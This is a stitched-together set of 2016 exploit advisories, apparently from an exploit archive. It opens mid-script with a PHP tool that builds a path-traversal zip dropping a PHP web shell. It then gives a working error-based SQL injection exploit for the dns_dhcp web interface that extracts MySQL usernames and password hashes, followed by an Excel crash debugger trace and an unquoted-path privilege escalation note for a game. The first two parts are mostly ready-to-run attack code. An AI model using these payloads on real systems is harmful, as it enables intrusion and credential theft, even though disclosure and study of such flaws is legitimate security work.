$cmd='<?php exec($_GET["cmd"]); ?>';
if(!empty($argv[2])&&is_numeric($argv[2])){
$depth=$argv[2];
}else{
echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
exit();
}
if(strtolower($argv[3])!="y"){
if(!empty($argv[3])){
$exploit_file=$argv[3];
}
if(!empty($argv[4])){
$cmd=$argv[4];
}else{
echo "Usage: enter a payload for file $exploit_file wrapped in double
quotes";
exit();
}
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo "================ by hyp3rlinx ===================";
?>
/*
///////////////////////////////////////////////////////////////////////
[Script examples]
Use default RCE.php by passing "y" flag creating DOOM.zip with path depth
of 2 levels
c:\>php evil-archive.php DOOM 2 Y
Create DOOM.zip with path depth of 4 levels and .htaccess file to overwrite
one on the system.
c:\>php evil-archive.php DOOM 4 .htaccess "allow from all"
Disclosure Timeline:
===================================
Vendor Notification: No reply
May 14, 2016 : Public Disclosure
Exploitation Method:
======================
Local
Severity Level:
================
Medium 6.3
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information.
hyp3rlinx
*/
/*
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt
[+] ISR: apparitionsec
Vendor:
====================
tmcdos / sourceforge
Product:
======================
dns_dhcp Web Interface
Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory
This is a very simple web interface for management of static DHCP leases in
DNSmasq and Mikrotik.
It generates config files for DNSmasq and uses RouterOS API to manage
Mikrotik. Network devices (usually PCs)
are separated into subnets by department and use triplets (hostname, MAC
address, IP address) for identification.
Information is stored in MySQL.
Vulnerability Type:
===================
SQL Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
The 'net' HTTP form POST parameter to dns.php script is not
checked/santized and is used directly in MySQL query allowing
attacker to easily exfiltrate any data from the backend database by using
SQL Injection exploits.
1) On line 239 of dns.php
$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b);
2)
dns.php line 187 the a_select function where 2nd argument $_REQUEST['net']
is passed to an concatenated to query ($clause)
and executed on line 194 mysql_query($query).
function a_select($tbl,$clause,$field='',$where='')
{
if ($clause==0) return ' ';
if($field=='') $field=$tbl;
$query = "SELECT $field FROM $tbl WHERE ";
if($where=='') $query.='ID='.$clause;
else $query.=$where;
$res = mysql_query($query) or
trigger_error($query.'<br>'.mysql_error(),E_USER_ERROR);
if(mysql_num_rows($res)>0) return mysql_result($res,0,0);
else return ' ';
}
Exploit code(s):
===============
Run from CL...
*/
<?php
#dns_dhcp SQL Injection Exploit
#exfiltrates host, user and password from MySQL
#by hyp3rlinx
#ISR - apparitionsec
#hyp3rlinx.altervista.org
#========================
$victim="localhost";
$url="/dns_dhcp/dns/dns.php";
$port=80;
$r='';
$s = fsockopen($victim, $port, $errno, $errstr, 30);
if(!$s){echo "Cant connect to the fucking server!"; exit();}
$sql="net=1 and (select 1 from(select count(*),concat((select (select
concat(0x2b,host,0x2b,user,0x2b,password,0x2b)) from mysql.user limit
1),floor(rand(0)*2))x from mysql.user group by x)a)";
$out = "POST $url HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($sql) . "\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($s, $out);
fwrite($s, $sql);
while (!feof($s)) {
$r .= fgets($s, 128);
if(strpos($r,'Duplicate entry')!==FALSE){
$idx=strpos($r,'Duplicate entry');
echo substr($r,$idx);
break;
}
}
fclose($s);
/*
Example result:
Duplicate entry
'+localhost+root+*6691484EA6B50DDDE1926A220DA01FA9E575C18A+1' for key
'group_key'
*/
?>
/*
Disclosure Timeline:
===============================
Vendor Notification: NA
May 14, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==================================================
Request Method(s): [+] POST
Vulnerable Product: [+] dns_dhcp Web Interface
Vulnerable Parameter(s): [+] 'net'
=====================================================
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
*/
Microsoft Office is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected application.
----------------------------------------------------------------------
Found : 11.05.2016
More: http://HauntIT.blogspot.com
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39819.zip
----------------------------------------------------------------------
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
CommandLine: "c:\Program Files\Microsoft Office\Office14\excel.EXE" C:\crash\sf_e626c69c89ab9e683eed52eeaaac93ca-109922.xlsx
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 30000000 313d1000 Excel.exe
ModLoad: 7c900000 7c9af000 ntdll.dll
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
(...)
ModLoad: 6bdc0000 6be7c000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
ModLoad: 65100000 6519e000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
(cb4.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\OGL.DLL -
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
0:000> r;!exploitable -v;r;ub;kv;q
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
(...)
Exception Faulting Address: 0x4
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Faulting Instruction:44175083 push dword ptr [ecx+4]
Basic Block:
44175083 push dword ptr [ecx+4]
Tainted Input operands: 'ecx'
44175086 push dword ptr [ecx]
Tainted Input operands: 'ecx'
44175088 mov ecx,dword ptr [ebp+8]
4417508b mov eax,dword ptr [ecx]
4417508d call dword ptr [eax+4]
Tainted Input operands: 'StackContents'
Exception Hash (Major/Minor): 0xd8abe4f2.0x3a6d64a1
Hash Usage : Stack Trace:
Major+Minor : OGL!GdipGetImageThumbnail+0x1118e
Major+Minor : OGL!GdipGetPathPointsI+0x2da6
Major+Minor : OGL!GdipGetPathPointsI+0x2b0e
Major+Minor : OGL!GdipGetPathPointsI+0x2a98
Major+Minor : GDI32!SetMetaRgn+0x87
Minor : OGL!GdipCreateMetafileFromWmfFile+0x652
Minor : OGL!GdipGetPathPointsI+0x2d1b
Minor : OGL!GdipGetPathPointsI+0x2b73
Minor : OGL!GdipCreateMetafileFromWmfFile+0x573
Minor : OGL!GdipGetVisibleClipBoundsI+0x1c6
Minor : OGL!GdipDrawImageRectRect+0x111
Minor : gfx+0x147d74
Minor : gfx+0x4f9f
Minor : gfx+0x13ec8
Minor : gfx+0x13ec8
Minor : gfx+0x13ec8
Minor : gfx+0x4ecd
Minor : gfx+0xed1a
Minor : gfx+0xecef
Minor : gfx+0xecc3
Minor : gfx+0xf6fc
Minor : gfx+0xe84d
Minor : gfx+0xf4db
Minor : gfx+0xe84d
Minor : gfx+0xf685
Minor : gfx+0xe817
Minor : gfx+0xebd8
Minor : oart!Ordinal3680+0xb8
Minor : oart!Ordinal1491+0x156
Minor : Excel!Ordinal40+0x20d620
Minor : Excel!Ordinal40+0x1f8e2c
Minor : Excel!Ordinal40+0x60961
Minor : Excel!Ordinal40+0x607aa
Minor : Excel!Ordinal40+0x5e95b
Minor : Excel!Ordinal40+0x5e76f
Minor : Excel!Ordinal40+0x2f054
Minor : Excel!Ordinal40+0x1763d
Minor : USER32!GetDC+0x6d
Minor : USER32!GetDC+0x14f
Minor : USER32!IsWindowUnicode+0xa1
Minor : USER32!CallWindowProcW+0x1b
Minor : Comctl32!Ordinal11+0x328
Minor : Comctl32!RemoveWindowSubclass+0x17e
Minor : Comctl32!DefSubclassProc+0x46
Minor : mso!Ordinal1888+0x38e
Minor : mso!Ordinal4894+0x24b
Minor : Comctl32!RemoveWindowSubclass+0x17e
Minor : Comctl32!DefSubclassProc+0xa9
Minor : USER32!GetDC+0x6d
Minor : USER32!GetDC+0x14f
Minor : USER32!DefWindowProcW+0x180
Minor : USER32!DefWindowProcW+0x1cc
Minor : ntdll!KiUserCallbackDispatcher+0x13
Minor : USER32!DispatchMessageW+0xf
Minor : Excel!Ordinal40+0x24572
Minor : Excel!Ordinal40+0x24441
Minor : Excel!Ordinal40+0x424b
Minor : Excel!Ordinal40+0x3f0a
Minor : kernel32!RegisterWaitForInputIdle+0x49
Instruction Address: 0x0000000044175083
Description: Read Access Violation near NULL
Short Description: ReadAVNearNull
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Read Access Violation near NULL starting at OGL!GdipGetImageThumbnail+0x000000000001118e (Hash=0xd8abe4f2.0x3a6d64a1)
This is a user mode read access violation near null, and is probably not exploitable.
----------------------------------------------------------------------
More:
> r
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
> ub
OGL!GdipGetImageThumbnail+0x1117b:
44175070 8b01 mov eax,dword ptr [ecx]
44175072 ff5004 call dword ptr [eax+4]
44175075 8bc8 mov ecx,eax
44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a)
4417507c 5d pop ebp
4417507d c21000 ret 10h
44175080 55 push ebp
44175081 8bec mov ebp,esp
> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0013e3a8 440787db 0ab4aea0 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e
0013e3c8 44078543 0000401d 00000000 00000000 OGL!GdipGetPathPointsI+0x2da6
0013e3f8 440784cd 0000015c 07915974 07915028 OGL!GdipGetPathPointsI+0x2b0e
0013e410 77f2067f 2f011136 012f2750 07915904 OGL!GdipGetPathPointsI+0x2a98
0013e490 44074c79 2f011136 404ccccc 4407840d GDI32!SetMetaRgn+0x87
0013e4c8 44078750 2f011136 3e460aa3 0013e548 OGL!GdipCreateMetafileFromWmfFile+0x652
0013e568 440785a8 43487fff 3e460aa3 0013e6a0 OGL!GdipGetPathPointsI+0x2d1b
0013e6b8 44074b9a 00000000 42c00000 42c00000 OGL!GdipGetPathPointsI+0x2b73
0013e7b4 4402cfc4 0ab4a320 00000000 00000000 OGL!GdipCreateMetafileFromWmfFile+0x573
0013e818 4403e16f 0ab4a320 0013e840 0013e850 OGL!GdipGetVisibleClipBoundsI+0x1c6
0013e888 438e7d74 00000000 00000000 00000000 OGL!GdipDrawImageRectRect+0x111
0013e998 437a4f9f 0874a780 07aeec68 ad01865f gfx+0x147d74
0013ea64 437b3ec8 0874a780 00000001 0722b898 gfx+0x4f9f
0013ea78 437b3ec8 0874a780 00000000 0722b848 gfx+0x13ec8
0013ea8c 437b3ec8 0874a780 0013eb40 0b06f120 gfx+0x13ec8
0013eaa0 437a4ecd 0874a780 ad018713 0013ee04 gfx+0x13ec8
0013eb28 437aed1a 0722b848 0013eb40 0013f194 gfx+0x4ecd
0013eb70 437aecef 0b06f120 0013ebac 0013f194 gfx+0xed1a
0013eb88 437aecc3 086f2410 0013ebac 0013f194 gfx+0xecef
0013ebf4 437af6fc 0013ec80 086f2410 00000002 gfx+0xecc3
----------------------------------------------------------------------
0:000> u eip
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4]
44175086 ff31 push dword ptr [ecx]
44175088 8b4d08 mov ecx,dword ptr [ebp+8]
4417508b 8b01 mov eax,dword ptr [ecx]
4417508d ff5004 call dword ptr [eax+4]
44175090 8bc8 mov ecx,eax
44175092 e8922bebff call OGL!GdipDeletePen+0x115 (44027c29)
44175097 5d pop ebp
0:000> kvn1
# ChildEBP RetAddr Args to Child
00 0013e308 440787db 08f22870 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e
0:000> dd ecx+4
00000004 ???????? ???????? ???????? ????????
00000014 ???????? ???????? ???????? ????????
00000024 ???????? ???????? ???????? ????????
00000034 ???????? ???????? ???????? ????????
00000044 ???????? ???????? ???????? ????????
00000054 ???????? ???????? ???????? ????????
00000064 ???????? ???????? ???????? ????????
00000074 ???????? ???????? ???????? ????????
0:000> u eip-11
OGL!GdipGetImageThumbnail+0x1117d:
44175072 ff5004 call dword ptr [eax+4]
44175075 8bc8 mov ecx,eax
44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a)
4417507c 5d pop ebp
4417507d c21000 ret 10h
44175080 55 push ebp
44175081 8bec mov ebp,esp
44175083 ff7104 push dword ptr [ecx+4] <= crash
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
----------------------------------------------------------------------
By: HauntIT Blog @ 2016
-----------------------------------------------------------------------------------------------------------------
# Exploit Title: Hex : Shard of Fate 1.0.1.026 - Privilege
Escalation Unquoted path vulnerability
# Date: 15/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://gameforge.com
# Software Link: https://hex.gameforge.com/ or via steam
# Version: 1.0.1.026 and probably prior
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
Summary : Hex: Shard of Fate is a new breed of digital card game, combining
classic TCG gameplay with elements of an online RPG
Description : The game executable is prone to an unquoted path
vulnerability. When you go to the in-game store it fail to quote the
following command which is used multiple times :
C:/Program Files (x86)/Steam/steamapps/common/HEX SHARDS OF
FATE/Hex_Data/StreamingAssets/uWebKit/Windows/x86/UWKProcess.exe -parentpid
5808
-processdb QzovVXNlcnMvVXRpbGlzYXRldXIvQXBwRGF0YS9Mb2NhbExvdy9IRVggRW50ZXJ0YWlubWVu
dC9IZXgvdVdlYktpdFByb2Nlc3MuZGI=
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.
POC :
Put a software named Program.exe in C:
Launch the game or steam with high privileges and go to store
POC video : https://www.youtube.com/watch?v=E1_1wZea1ck
Patch :
Still waiting, no reward so full disclosure after 10 days
-----------------------------------------------------------------------------------------------------------------